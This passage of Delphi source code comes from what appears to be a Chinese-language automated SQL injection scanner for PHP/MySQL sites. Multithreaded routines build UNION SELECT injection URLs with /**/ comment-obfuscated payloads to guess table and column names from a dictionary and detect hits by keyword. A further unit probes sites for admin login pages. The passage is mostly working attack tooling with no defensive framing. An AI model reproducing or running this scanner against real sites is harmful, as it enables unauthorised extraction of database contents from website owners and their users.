PHP+MYSQL网站注入扫描[22]

integer;
begin
stoped :=false;
with form1 do
begin
  pg1.min :=0;
  pg1.max :=form1.lsbdict.count;
  pg1.step :=1;
  pg1.position :=0;
  pg1.visible :=true;
end;
entercriticalsection(cs); //进入临界区
fmemo.lines.add('');
fmemo.lines.add('开始猜解表段。。。');
fmemo.lines.add('');
for i:=0 to form1.lsbdict.count-1 do
begin
  if stoped then
  begin
    fmemo.lines.add('');
  fmemo.lines.add('表段猜解结束。。。');
  form1.pg1.visible :=false;
  exit;
  end;
  fvalue :=form1.lsbdict.items;
  if fvalue='' then continue;
  injurl :=furl+'/**/and/**/1=1/**/union/**/select/**/'+fstr+'/**/from/**/'+fvalue+'/*';
  fmemo.lines.add(injurl);
  form1.pg1.stepit;
  if get(injurl,fkeyword) then
  begin
    synchronize(scantableresult); //同步
  end;
end;
fmemo.lines.add('');
fmemo.lines.add('表段猜解结束。。。');
form1.pg1.visible :=false;
leavecriticalsection(cs); //退出临界区
sleep(20); // 线程挂起;
end;

//创建多个线程完成字段猜解
constructor scanfieldthread.create(url,str,keyword,table:string;num:integer;memo:tmemo;listview:tlistview);
begin
flistview :=listview;
fmemo :=memo;
furl :=url;
fkeyword :=keyword;
fstr :=str;
ftable :=table;
fnum :=num;
freeonterminate := true; // 自动删除
initializecriticalsection(cs); //初始化临界区
//inherited create(furl,fkeyword,fmemo); // 直接运行
inherited create(false);
end;

procedure scanfieldthread.scanfieldresult;
begin
with flistview.items.add do
begin
  caption :=inttostr(flistview.items.count);
  subitems.add(fvalue);
end;
end;

procedure scanfieldthread.execute;
var
i:integer;
tmpstr:string;
begin
fvalue :=form1.lsbdict.items[fnum];
tmpstr :=stringreplace(fstr,'&fieldname&',fvalue,[rfignorecase]);
injurl:=furl+'/**/and/**/1=1/**/union/**/select/**/'+tmpstr+'/**/from/**/'+ftable+'/*';
entercriticalsection(cs); //进入临界区
fmemo.lines.add(injurl);
if get(injurl,fkeyword) then
begin
  synchronize(scanfieldresult); //同步
end;
leavecriticalsection(cs); //退出临界区
sleep(20); // 线程挂起;
end;

end.


//后台管理扫描线程类
unit unit3;

interface

uses
classes,stdctrls,windows,sysutils,comctrls,wininet;

var
cs:trtlcriticalsection;   //定义全局临界区

type
scanmanagerthread = class(tthread)
private
  tmplbx :tlistbox;
  tmpmemo :tmemo;
  tmpnum :integer;
  tmpurl :string;
  str :string;
  procedure scanresult;
protected
  procedure execute; override;
public
  constructor create(url:string; num: integer;lbx: tlistbox;memo:tmemo);
end;

implementation

uses unit1;

constructor scanmanagerthread.create(url:string; num: integer;lbx: tlistbox;memo:tmemo);
begin
tmpurl :=url;
tmpnum :=num; // 传递参数
tmplbx :=lbx;
tmpmemo :=memo;
freeonterminate :=true; // 自动删除
initializecriticalsection(cs); //初始化临界区
inherited create(false); // 直接运行
end;

//====================== 判断网址是否存在的函数 =======================
function checkurl(url: string; timeout: integer = 5000): boolean;
var
hsession, hfile, hrequest: hinternet;
dwindex, dwcodelen: dword;
dwcode: array[1..20] of char;
res: pchar;
re: integer;
err1: integer;
j: integer;
begin
if pos('http://', lowercase(url)) = 0 then
  url := 'http://' + url;
result := false;
internetsetoption(hsession, internet_option_connect_timeout, @timeout, 4);
hsession := internetopen('mozilla/4.0', internet_open_type_preconfig, nil, nil, 0);
  //设置超时
if assigned(hsession) then
begin
  j := 1;
  while true do
  begin
    hfile := internetopenurl(hsession, pchar(url), nil, 0, internet_flag_reload, 0);
  if hfile = nil then
    begin
    j := j + 1;
    err1 := getlasterror;
    if j > 5 then break;
    if (err1 <> 12002) or (err1 <> 12152) then break;
    sleep(2);
    end
    else begin
    break;
    end;
  end;
  dwindex := 0;
  dwcodelen := 10;
  httpqueryinfo(hfile, http_query_status_code, @dwcode, dwcodelen, dwindex);
  res := pchar(@dwcode);
  re := strtointdef(res, 404);
  case re of
    400..450: result := false;
  else result := true;
  end;
  if assigned(hfile) then
    internetclosehandle(hfile);
    internetclosehandle(hsession);
  end